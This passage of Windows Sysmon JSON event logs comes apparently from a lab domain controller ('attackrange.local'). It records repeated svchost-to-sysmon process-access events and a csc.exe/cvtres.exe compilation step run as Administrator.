05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4636,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4637,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4638,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4639,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4640,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4641,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4642,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.358\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0315-5F25-0000-001077050700}\r\nTargetProcessId: 3652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.358","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0315-5F25-0000-001077050700}","TargetProcessId":"3652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4643,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.433\r\nProcessGuid: {A837DB8D-0315-5F25-0000-001005090700}\r\nProcessId: 3320\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES7A86.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\CSC425C408B2BF74100922E7DB5DC4E944E.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-0315-5F25-0000-001077050700}\r\nParentProcessId: 3652\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\otdkyjr3\\otdkyjr3.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.433","ProcessGuid":"{A837DB8D-0315-5F25-0000-001005090700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES7A86.tmp\" 